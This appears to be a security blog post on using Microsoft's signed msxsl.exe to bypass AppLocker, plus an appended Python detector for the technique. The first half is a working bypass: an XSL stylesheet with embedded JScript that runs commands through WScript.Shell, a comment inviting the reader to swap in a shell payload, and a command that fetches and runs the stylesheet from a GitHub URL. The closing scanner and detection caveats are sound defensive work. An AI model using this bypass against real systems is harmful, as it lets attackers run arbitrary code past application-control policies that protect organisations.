1. The technique relies on Microsoft's msxsl.exe, a command-line XSLT processor. Because it supports the msxsl:script extension, a stylesheet can embed JScript, and that JScript can instantiate COM objects such as WScript.Shell to run system commands. msxsl.exe is a Microsoft-signed binary, so application control policies that trust Microsoft-signed executables will let it run. The tool is downloaded from:
https://www.microsoft.com/en-us/download/confirmation.aspx?id=21714
2. The tool takes two inputs, an XML document and an XSL stylesheet, and is invoked as:
msxsl.exe Test.xml exec.xsl
Test.xml:
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="exec.xsl"?>
<customers>
  <customer>
    <name>Microsoft</name>
  </customer>
</customers>
exec.xsl (namespace URIs, attribute names and JScript identifiers are case-sensitive, so the namespaces must be exactly http://www.w3.org/1999/XSL/Transform and urn:schemas-microsoft-com:xslt, the function is called as user:xml(.), and the script body is wrapped in CDATA so that characters such as & need no XML escaping):
<?xml version="1.0"?>
<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:msxsl="urn:schemas-microsoft-com:xslt"
    xmlns:user="http://mycompany.com/mynamespace">
  <msxsl:script language="JScript" implements-prefix="user"><![CDATA[
    function xml(nodelist) {
      var r = new ActiveXObject("WScript.Shell").Run("cmd /c calc.exe");
      // Replace the command with your own payload, for example:
      // var r = new ActiveXObject("WScript.Shell").Run("cmd /k cd C:\\ & shell.exe");
      return nodelist.nextNode().xml;
    }
  ]]></msxsl:script>
  <xsl:template match="/">
    <xsl:value-of select="user:xml(.)"/>
  </xsl:template>
</xsl:stylesheet>
3. Running the command launches calc.exe.
4. The XML and XSL inputs can also be fetched from a remote HTTP(S) URL instead of local files:
msxsl.exe https://raw.githubusercontent.com/backlion/demo/master/test.xml https://raw.githubusercontent.com/backlion/demo/master/exec.xsl
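The defender's side of this technique, as an added example that is not part of the original post and not msxsl's own code: a small Python scanner that (a) flags any stylesheet carrying an msxsl:script block and names the first COM entry point (ActiveXObject, WScript.Shell, ...) used inside it, and (b) classifies process command lines that launch msxsl.exe, marking the ones whose inputs are remote URLs. The sample stylesheets and command lines are constructed for the demonstration; the malicious stylesheet is the exec.xsl from this page, tidied, and the URLs use the reserved example.invalid domain.

```python
"""Offline checks for the msxsl.exe extension-script technique (added example)."""
import re
import xml.etree.ElementTree as ET

MSXSL_NS = "urn:schemas-microsoft-com:xslt"
# msxsl.exe defaults to JScript when <msxsl:script> carries no language attribute,
# so a block without one is still executable script.
DEFAULT_SCRIPT_LANG = "jscript"
# COM / Windows Script Host entry points that let a "stylesheet" reach the OS.
SUSPICIOUS_CALLS = re.compile(
    r"ActiveXObject|WScript\.Shell|Shell\.Application|Scripting\.FileSystemObject|CreateObject",
    re.I)
# msxsl or msxsl.exe as a path component, not as a substring of another name.
MSXSL_EXE = re.compile(r"""(?:^|[\\/\s"'])msxsl(?:\.exe)?(?=$|[\s"'])""", re.I)
URL_ARG = re.compile(r"""https?://[^\s"']+""", re.I)


def scan_stylesheet(xsl_text):
    """Return one finding (dict) per <msxsl:script> element in an XSL document.

    Every such block is arbitrary script execution, so each is reported;
    'com_call' is the first OS-reaching API found in it, or None.
    """
    root = ET.fromstring(xsl_text)
    findings = []
    for node in root.iter("{%s}script" % MSXSL_NS):
        lang = DEFAULT_SCRIPT_LANG
        for attr, value in node.attrib.items():
            if attr.lower() == "language":  # tolerate odd casing seen in the wild
                lang = value.strip().lower()
        body = "".join(node.itertext())  # CDATA content is returned as plain text
        hit = SUSPICIOUS_CALLS.search(body)
        findings.append({
            "language": lang,
            "implements_prefix": node.get("implements-prefix"),
            "com_call": hit.group(0) if hit else None,
        })
    return findings


def scan_command_line(cmdline):
    """Classify a process command line (e.g. from Sysmon event 1 / 4688).

    Returns None when msxsl.exe is not the image launched; otherwise a dict
    listing any remote URLs passed as arguments and whether one was seen.
    """
    if not MSXSL_EXE.search(cmdline):
        return None
    urls = URL_ARG.findall(cmdline)
    return {"remote": bool(urls), "urls": urls}


# Constructed sample: the page's exec.xsl, tidied. It spawns calc.exe via WScript.Shell.
MALICIOUS_XSL = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:msxsl="urn:schemas-microsoft-com:xslt"
    xmlns:user="http://mycompany.com/mynamespace">
  <msxsl:script language="JScript" implements-prefix="user"><![CDATA[
    function xml(nodelist) {
      var r = new ActiveXObject("WScript.Shell").Run("cmd /c calc.exe");
      return nodelist.nextNode().xml;
    }
  ]]></msxsl:script>
  <xsl:template match="/">
    <xsl:value-of select="user:xml(.)"/>
  </xsl:template>
</xsl:stylesheet>
"""

# Constructed sample: a legitimate stylesheet that uses the msxsl namespace only
# for node-set(), with no embedded script. Must produce no findings.
BENIGN_XSL = """<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:msxsl="urn:schemas-microsoft-com:xslt">
  <xsl:template match="/">
    <xsl:variable name="rows"><row/></xsl:variable>
    <xsl:value-of select="count(msxsl:node-set($rows)/row)"/>
  </xsl:template>
</xsl:stylesheet>
"""

# Constructed sample command lines: local run, remote run, unrelated XSLT tool.
SAMPLE_CMDLINES = [
    r"C:\Tools\msxsl.exe Test.xml exec.xsl",
    r"msxsl.exe https://files.example.invalid/test.xml https://files.example.invalid/exec.xsl",
    r'"C:\Program Files\Tool\convert.exe" data.xml report.xsl',
]

if __name__ == "__main__":
    for f in scan_stylesheet(MALICIOUS_XSL):
        print("msxsl:script block: language=%(language)s, prefix=%(implements_prefix)s, "
              "COM call=%(com_call)s" % f)
    print("benign stylesheet findings:", scan_stylesheet(BENIGN_XSL))
    for c in SAMPLE_CMDLINES:
        print(c, "->", scan_command_line(c))
```

Two caveats for anyone turning this into a detection rule: the command-line check matches on the image name, so a renamed copy of msxsl.exe slips past it and should be caught with the OriginalFileName field or a file hash from process-creation telemetry instead; and the stylesheet check reports every msxsl:script block, not only those with a known COM call, because the language defaults to JScript and the payload can be obfuscated.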
Using MSXSL.exe to bypass AppLocker application control policies